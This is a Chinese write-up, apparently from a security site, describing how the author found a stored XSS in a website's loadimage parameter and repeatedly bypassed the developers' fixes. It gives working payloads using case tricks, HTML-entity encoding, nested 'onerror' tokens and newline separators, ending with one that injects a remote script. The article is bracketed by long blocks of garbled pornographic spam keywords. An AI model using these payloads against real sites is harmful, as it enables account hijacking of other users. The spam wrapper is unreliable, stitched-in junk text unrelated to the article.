精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

存儲(chǔ)型XSS從易到難的挖掘過程

安全 應(yīng)用安全
一日在某站點(diǎn)發(fā)現(xiàn)一個(gè)找茬活動(dòng),感覺是另類的src就參與了一下。就發(fā)生了這次有趣的XSS測試過程。

一日在某站點(diǎn)發(fā)現(xiàn)一個(gè)找茬活動(dòng),感覺是另類的src就參與了一下。就發(fā)生了這次有趣的XSS測試過程。

[[113194]]

0×00 開始

(注意1)XSS不僅存在于頁面上直觀所在的位置,所有用戶輸入的信息都有可能通過不同形式返回到頁面上,因此直接操作數(shù)據(jù)包來查找XSS顯得更加有效。

回到該站點(diǎn),在該站點(diǎn)一處生成app處存在一處忘記過濾。

發(fā)送的數(shù)據(jù)包如下:

  1. appName=TEST&icon=&loadimage=%2Ftemplate201309%2F29%2Floadimage%2F1a8aaba1-42bd-401b-9995-0f7ba08f191b.png&diyAppid=0210bd39-de98-4a1b-b855-4b0a0732894a 

經(jīng)過測試發(fā)現(xiàn)其中l(wèi)oadimage參數(shù)未經(jīng)過過濾,這也就是我說的隱藏的輸入輸出位,最終直接構(gòu)造:

  1. loadimage=xxxxx"%20onerror="alert(1)"  

存儲(chǔ)型XSS從易到難的挖掘過程

0×01 覺醒

在漏洞上報(bào)之后,程序員覺醒了,由于涉及其它頁面參數(shù)輸出過濾的影響,無法直接使用粗暴的編碼把”(雙引號(hào))過濾,而是使用一定的過濾規(guī)則來規(guī)避xss攻擊。

(注意2)XSS繞過一般針對(duì)于程序員所使用的過濾規(guī)則的疏漏,但是首要目標(biāo)應(yīng)該是在程序員未過濾的點(diǎn)上,而只有規(guī)則的不嚴(yán)謹(jǐn)才有繞過的可能。

在得到客服的回復(fù)確認(rèn)漏洞修復(fù)之后,再次回到該點(diǎn)進(jìn)行測試,繼而發(fā)現(xiàn)了有趣的情況。

測試代碼:

  1. loadimage=xxxxx"%20onerror="alert(1)" à  <img class="appicon_img" src="xxxxxx" ***(1)> 

經(jīng)過這個(gè)測試用例發(fā)現(xiàn),在空格之后的內(nèi)容經(jīng)過了一次處理,將其中alert替換成了***,onerror=直接刪除。

分析發(fā)現(xiàn)空格之后的內(nèi)容會(huì)被直接刪除,onXXX被直接刪除。

于是結(jié)合過往經(jīng)驗(yàn),使用大小寫來嘗試?yán)@過字符串替換。

測試代碼:

  1. loadimage=xxxxx"onError="alert(1)" à<img class="appicon_img" src="xxxxxx"onError=”***(1)”> 

于是我們利用了瀏覽器的一個(gè)特性,在解析的時(shí)候?qū)㈦p引號(hào)與其后內(nèi)容分割,所以在源碼中是:

  1. <img class="appicon_img" src="xxxxxx"onError=”***(1)”> 

而解析過程中顯示:

  1. <img class="appicon_img" src="xxxxxx" onError=”***(1)”>(自動(dòng)添加空格) 

之后就是要構(gòu)造我們的alert。(只有alert才是我想要的,什么prompt,confirm都不是我想要的。)

這里要說到的就是轉(zhuǎn)編碼的利用。

詳文可參考:

http://drops.wooyun.org/tips/689

處于html上下文的字符串將會(huì)優(yōu)先進(jìn)行一次html解碼,而處于onXXXX、javascript:、script等標(biāo)簽之中的則處于javascript上下文,其中變量字符串將會(huì)執(zhí)行一次javascript解碼。

運(yùn)用這個(gè)特性,我們可以在onerror事件當(dāng)中使用html編碼來構(gòu)造任意字符,而其中所必須的字符為&,很幸運(yùn)的時(shí)該字符并未被過濾。因此我可以使用其構(gòu)造任意字符,達(dá)到繞過的效果。

直接構(gòu)造:

  1. loadimage=xxxxx"onError="%26#x61lert(1)" 

0×02 絕殺

再次提交客服,并得到修復(fù)確認(rèn)后,又進(jìn)行了一次測試,之后繼續(xù)有趣。

(注意3)確定過濾規(guī)則是繞過限制的第一步,通過已知規(guī)則構(gòu)造繞過payload來生成所需字符為最終目的。

繞過富文本大概的思路就是這樣。

繼續(xù)通過輸入不同字符串來檢查新增的過濾規(guī)則,最終得到幾條有用的信息:

  1. <img src="1"onerroonerrorr=r/> ==> <img src="1"onerror> 
  2. <img src="1"onerror===”xxx” /> ==> <img src="1" =”xxx” /> 

本以為結(jié)合一下就成了,沒想到變成這樣:

  1. <img src="1"onerroonerrorr=ronerror===”xxx”/> ==> <img src="1" /> 

初步分析等到的規(guī)則:

1、onxxx= 將會(huì)去除on以及=和它們之間的內(nèi)容

2、有 = 號(hào)就會(huì)檢查前面有沒有on

3、tab %20(空格)之后的內(nèi)容全部清除

4、碰到雙引號(hào)就停止刪除

大概統(tǒng)計(jì)了一下以上的過濾規(guī)則,就可以開始構(gòu)造payload了。

使用src=”1″onerroonerrorr=r生成onerror。

使用%0a(換行)來分割導(dǎo)致過濾不起作用。

最終完成了整條payload:

  1. <img src="1"onerroonerrorr=r%0a="prompt(/just kidding!/)" /> 

(這次不計(jì)較與alert了,使用上一條方法即可。)

最終截圖:

存儲(chǔ)型XSS從易到難的挖掘過程

同樣可以解析成功!

存儲(chǔ)型XSS從易到難的挖掘過程

0×03 利用

完整的XSS一定需要附帶利用的過程,可完整構(gòu)造payload還需要考慮很多情況,比如關(guān)鍵字符串的替換、輸出點(diǎn)允許的最大字長、是否可影響其他用戶或管理員。

最終偵查該點(diǎn),長度為262個(gè)字符,替換了script、create等字符,不過通過之前記錄下來的方法完全可以利用。

Payload:

  1. <img/src="1" onerroonerrorr=r%0a="window.s=document.cre%26#61teElement(String.fromCh%26#61rCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(1,2,3,4,5,6,7,8);document.body.%26#61ppendChild(window.s)"> 

即使你的xss平臺(tái)URL很長,也可以通過利用短域名壓縮的方式達(dá)到一個(gè)較低的水平。

0×04 總結(jié)

新手在找XSS的時(shí)候總是存在一些盲點(diǎn),無法全面的獲取用戶輸入位以及該點(diǎn)的輸出頁面,對(duì)于存儲(chǔ)型XSS來說,輸出的頁面不局限于當(dāng)前頁面。

探查程序的代碼邏輯是繞過的根本,fuzz雖然提高了效率,但是想要準(zhǔn)確的發(fā)現(xiàn)問題必須有要針對(duì)性的構(gòu)造語句。

另外一些領(lǐng)悟可以移駕gainover所寫的一篇短文:

http://zone.wooyun.org/content/1557

0×05 后話

最后一次繞過是在5.12,不知道之后該站程序員會(huì)怎么樣去處理這個(gè)問題。

責(zé)任編輯:藍(lán)雨淚 來源: 網(wǎng)絡(luò)安全攻防實(shí)驗(yàn)室
相關(guān)推薦

2013-11-27 17:12:27

2011-07-21 09:25:41

2014-07-03 10:01:40

XSS漏洞存儲(chǔ)型XSS漏洞

2012-12-10 13:24:15

回歸分析數(shù)據(jù)挖掘

2022-08-30 09:42:35

MC-LAG單鏈路網(wǎng)絡(luò)

2013-11-14 10:27:54

2018-04-11 16:52:44

2014-12-05 10:51:57

軟件定義存儲(chǔ)閃存云應(yīng)用

2018-11-21 10:57:50

雷軍錘子小米

2010-05-05 11:06:32

Oracle存儲(chǔ)過程

2018-06-05 08:36:47

內(nèi)部部署云存儲(chǔ)

2021-10-08 16:33:29

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2021-09-22 11:06:50

易點(diǎn)云

2024-10-22 16:59:07

2019-03-25 07:27:14

XSS漏洞Ecshop

2011-08-11 16:56:45

數(shù)據(jù)挖掘

2021-11-08 07:11:49

決策樹數(shù)據(jù)分類器

2011-07-22 16:11:12

java

2011-06-15 15:29:25

Qt C++

2018-07-30 09:00:49

技術(shù)管理實(shí)踐
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

国产精品91久久| 日韩精品视频中文在线观看| 一区二区在线观| 国产av一区二区三区精品| 欧美久久成人| 日韩av在线精品| mm131亚洲精品| 不卡一本毛片| 亚洲国产精品99久久久久久久久| 91精品国产一区二区三区动漫 | 欧美成人黄色网址| 伊人222成人综合网| 久久久一区二区三区捆绑**| 91精品视频大全| 国产 日韩 欧美 在线| 欧美激情欧美| 精品视频偷偷看在线观看| 热久久久久久久久| 性爽视频在线| 一区二区三区中文在线观看| 日韩一二三区不卡在线视频| 欧美少妇bbw| 九一九一国产精品| 欧日韩不卡在线视频| 欧美人妻精品一区二区三区| 精品久久久久久久久久久下田| 欧美不卡一区二区三区| 男人添女人下面免费视频| 日韩欧美精品一区二区三区| 亚洲女女做受ⅹxx高潮| 日本在线观看一区二区三区| 五月婷婷狠狠干| 国产精品77777竹菊影视小说| 国产精品久久久久久久久久久久| 亚洲黄色三级视频| 黄色工厂这里只有精品| 九九久久久久99精品| 国产不卡在线观看视频| 菠萝蜜一区二区| 亚洲欧美日韩中文在线制服| 美国黄色a级片| 外国成人在线视频| 亚洲国产精品一区二区久| 麻豆av免费看| xvideos.蜜桃一区二区| 日韩亚洲欧美在线| 亚洲一级片免费观看| 日韩综合久久| 8v天堂国产在线一区二区| 国产精品视频分类| 日韩专区视频| 337p亚洲精品色噜噜噜| 8x8x成人免费视频| 亚洲精品777| 91精品国产综合久久久久| 奇米视频7777| 精品国产亚洲一区二区三区在线 | 无尽裸体动漫2d在线观看| 少妇精品视频一区二区免费看| 日韩欧美亚洲综合| 日本在线视频www| 欧美三级网址| 欧美网站一区二区| 亚洲视频第二页| 玖玖精品一区| 亚洲国产成人精品女人久久久| 岛国精品一区二区三区| 久久人人爽人人爽人人片av不| 亚洲国模精品私拍| 国产毛片久久久久久久| 日韩精品一区二区三区免费观影| 日韩视频免费中文字幕| 欧美片一区二区| 99re国产精品| 国产精品狠色婷| 国产精品爽爽久久| 丁香婷婷综合五月| 免费一区二区三区| eeuss影院在线观看| 中文字幕一区二区日韩精品绯色| 青青草视频国产| 婷婷电影在线观看| 欧美浪妇xxxx高跟鞋交| 特级特黄刘亦菲aaa级| 亚洲+小说+欧美+激情+另类| 色吧影院999| 久久久综合久久久| 久久精品123| 91影院在线免费观看视频| 刘玥91精选国产在线观看| 久久免费精品国产久精品久久久久| 亚洲春色在线| www红色一片_亚洲成a人片在线观看_| 福利二区91精品bt7086| 亚洲精品性视频| 国产精品对白| 中文字幕日韩在线视频| 久久久久黄色片| 久久综合九色| 动漫一区二区在线| yes4444视频在线观看| 亚洲自拍另类综合| 亚洲免费av一区二区三区| 午夜免费欧美电影| 在线国产精品视频| 黄色激情视频在线观看| 麻豆久久一区二区| 精品久久sese| a免费在线观看| 日本道免费精品一区二区三区| 国产成人精品综合久久久久99 | 波多野结衣不卡| 国产xxx精品视频大全| 先锋影音日韩| 激情黄产视频在线免费观看| 欧美一级黄色片| 国产99在线 | 亚洲| 99成人在线| 91欧美精品成人综合在线观看| 色视频免费在线观看| 亚洲精品免费看| 欧美三级理论片| 国产99亚洲| 国色天香2019中文字幕在线观看| 91成人一区二区三区| 国产网红主播福利一区二区| 国产精品333| 亚洲一区二区免费在线观看| 日韩三级影视基地| 中文字幕天堂在线| 91丝袜国产在线播放| 男人天堂a在线| 精品国产亚洲一区二区在线观看| 日韩在线观看网址| 进去里视频在线观看| 91丝袜高跟美女视频| 免费不卡av在线| 视频免费一区二区| 欧美成人性生活| 国产精品污视频| 国产精品久久久久一区| 簧片在线免费看| 国产免费av一区二区三区| 98视频在线噜噜噜国产| 蜜臀av午夜精品| 亚洲综合色区另类av| 一起草最新网址| 亚洲欧美亚洲| 97视频中文字幕| 乱插在线www| 精品久久五月天| 国产精品a成v人在线播放| 懂色av一区二区三区蜜臀| 青青草视频国产| 国产女人18毛片水真多18精品| 欧美激情一级欧美精品| 蜜臀av中文字幕| 欧美日韩亚洲视频| 能直接看的av| 精品在线播放免费| 影音先锋成人资源网站| swag国产精品一区二区| 91干在线观看| 亚洲av无码一区二区三区网址| 日韩精品在线观看免费| 国产一区二区三区免费观看| 欧美大片免费播放| 国产精品白浆| 国产精品999999| 日本高清视频在线播放| 欧美一区二区三区电影| 国产精品成人国产乱| 久久久五月婷婷| 成人不卡免费视频| 激情综合自拍| 日韩视频在线观看国产| 伊人久久大香伊蕉在人线观看热v| 欧美成人免费小视频| 日本毛片在线观看| 在线观看国产日韩| 国产精品免费人成网站酒店| 成人h精品动漫一区二区三区| 欧美污视频网站| 久久一区91| 好看的日韩精品| 欧美aaaaaaaa| 性欧美暴力猛交69hd| 国产福利免费在线观看| 日韩一区二区三区三四区视频在线观看 | 九九视频精品在线观看| 欧美91精品| 欧美日本国产精品| 成人日韩视频| 日本欧美精品在线| a在线免费观看| 国产一区二区美女视频| 亚洲高清视频网站| 欧美亚洲图片小说| 97免费在线观看视频| 1000部国产精品成人观看| 性久久久久久久久久久| 国产综合色在线视频区| 男人亚洲天堂网| 亚洲无线视频| 老司机av福利| 国产欧美一区二区精品久久久| 成人av免费在线看| 国产韩日精品| 91黑丝高跟在线| 在线免费av导航| 最新69国产成人精品视频免费| 污视频在线免费| 日韩一级二级三级| 中文字幕人妻一区二区三区视频| 亚洲成a天堂v人片| 欧美老熟妇一区二区三区| 国产日产欧美一区二区三区| 亚洲无人区码一码二码三码| 久久成人综合网| 黄色国产精品视频| 亚洲精品在线二区| 日本久久久网站| 欧美激情理论| 亚洲精品美女久久7777777| 日韩高清三区| 国产一区二区久久久| 日韩中文字幕一区二区高清99| 国产精品久久二区| 免费观看成人性生生活片| 69av成年福利视频| 男女羞羞视频在线观看| 九九热r在线视频精品| 国产视频中文字幕在线观看| 色悠悠久久久久| 国产精品麻豆一区二区三区 | 日本在线视频站| 国产亚洲福利一区| 国产三级视频在线播放线观看| 日韩av在线高清| 午夜影院在线视频| 日韩成人在线网站| 色视频在线观看| 日韩精品电影网| 日韩电影免费| 亚洲视频axxx| 丁香在线视频| 色偷偷偷亚洲综合网另类| 伦xxxx在线| 久久影院在线观看| 影院在线观看全集免费观看| 欧美美最猛性xxxxxx| 成人福利电影| 91av在线国产| 欧美三级精品| 国产日韩在线看片| 久久国产精品免费一区二区三区| 91视频免费在线| 99香蕉久久| 久久国产精品亚洲va麻豆| 一区二区三区日本久久久| 欧美资源一区| 欧美hd在线| 无码熟妇人妻av在线电影| 国产精品久久777777毛茸茸 | 日韩一级性生活片| 国产欧美综合一区二区三区| 麻豆传传媒久久久爱| 热久久一区二区| 污污视频在线免费| 99久久免费精品高清特色大片| 四虎影成人精品a片| 国产精品拍天天在线| 中文字幕影音先锋| 欧美日韩亚洲一区二| 在线免费看av的网站| 日韩视频免费观看高清完整版在线观看| 国产自产一区二区| 亚洲欧美日韩精品久久| 日本精品一区二区三区在线播放| 欧美激情乱人伦一区| 中文字幕在线直播| 成人免费自拍视频| 亚洲精品3区| 五月天色婷婷综合| 国产一区二区三区的电影 | 久久国产精品网站| 国产精品蜜芽在线观看| 国产精品视频永久免费播放| 欧美电影在线观看一区| 鲁丝一区二区三区免费| 天天射天天综合网| 免费看一级大黄情大片| 国产综合成人久久大片91| 在线视频 日韩| 中文字幕一区二区三区不卡在线 | 你懂得视频在线观看| 亚洲一区二区四区蜜桃| 中文字幕欧美色图| 日韩精品一二三四区| 免费看美女视频在线网站| 欧美亚洲成人精品| 久久综合给合| 亚洲五月六月| 麻豆精品网站| 亚洲一二三四五| 亚洲婷婷综合久久一本伊一区| 日韩精品在线免费看| 91精品国产色综合久久不卡电影| 日韩a在线观看| 欧美激情精品久久久久| 亚洲一区导航| 日韩精品福利视频| 99国产精品| 福利精品视频在线| 最近中文字幕无免费| 亚洲欧洲精品成人久久奇米网| 国产无人区码熟妇毛片多| 日韩视频中午一区| 日本在线观看免费| 国产精品扒开腿做爽爽爽视频| 国产伦理久久久久久妇女| 国产免费xxx| 蜜桃视频在线一区| 亚洲一级中文字幕| 午夜精品久久久久久久蜜桃app| 一本色道久久综合无码人妻| 亚洲一级一级97网| 一个人www视频在线免费观看| av一区观看| 亚洲国产日韩欧美在线| 污片在线免费看| 国产日韩欧美亚洲| 91丝袜一区二区三区| 亚洲精品国精品久久99热一| 精精国产xxxx视频在线中文版| 91久久中文字幕| 99久久久久| 91看片破解版| 亚洲欧美在线视频观看| 亚洲无码久久久久| 日韩中文字幕在线免费观看| 久久人体av| 在线观看福利一区| 精品亚洲国产成人av制服丝袜| 精品女人久久久| 欧美日韩中文字幕一区二区| yourporn在线观看中文站| 国产视频福利一区| 性欧美69xoxoxoxo| 午夜免费福利网站| 亚洲综合清纯丝袜自拍| 亚洲欧美高清视频| 国模叶桐国产精品一区| 秋霞影视一区二区三区| ww国产内射精品后入国产| 99re亚洲国产精品| 国产伦精品一区二区三区视频我| 国产午夜精品免费一区二区三区| 成人自拍av| 一卡二卡3卡四卡高清精品视频| 久久er精品视频| 在线免费日韩av| 亚洲国产精品一区二区三区| 中文字幕乱码在线播放| 日韩欧美亚洲日产国| 激情小说亚洲一区| 麻豆changesxxx国产| 亚洲精品xxxx| 日本.亚洲电影| 亚洲av综合色区| av男人天堂一区| 国产精品高清无码| 欧美成人免费在线视频| 久久久久高潮毛片免费全部播放| 欧美日韩第二页| 国产精品久久久久久久久久久免费看 | cao在线视频| 日本一区网站| 国产传媒一区在线| 国产a∨精品一区二区三区仙踪林| 亚洲社区在线观看| 一区二区三区国产好| 日韩av在线综合| 亚洲免费色视频| 日本精品专区| 91网站在线免费观看| 99在线观看免费视频精品观看| 欧美大波大乳巨大乳| 精品久久久久av影院| 国产精品亚洲一区二区三区在线观看| 欧美少妇一区二区三区| 久久亚洲综合av| aaaa一级片| 国产精品扒开腿做爽爽爽的视频| 欧美视频成人| 天堂资源在线视频| 精品亚洲夜色av98在线观看| 国产精品毛片无码| 97在线播放视频| 亚洲制服丝袜av|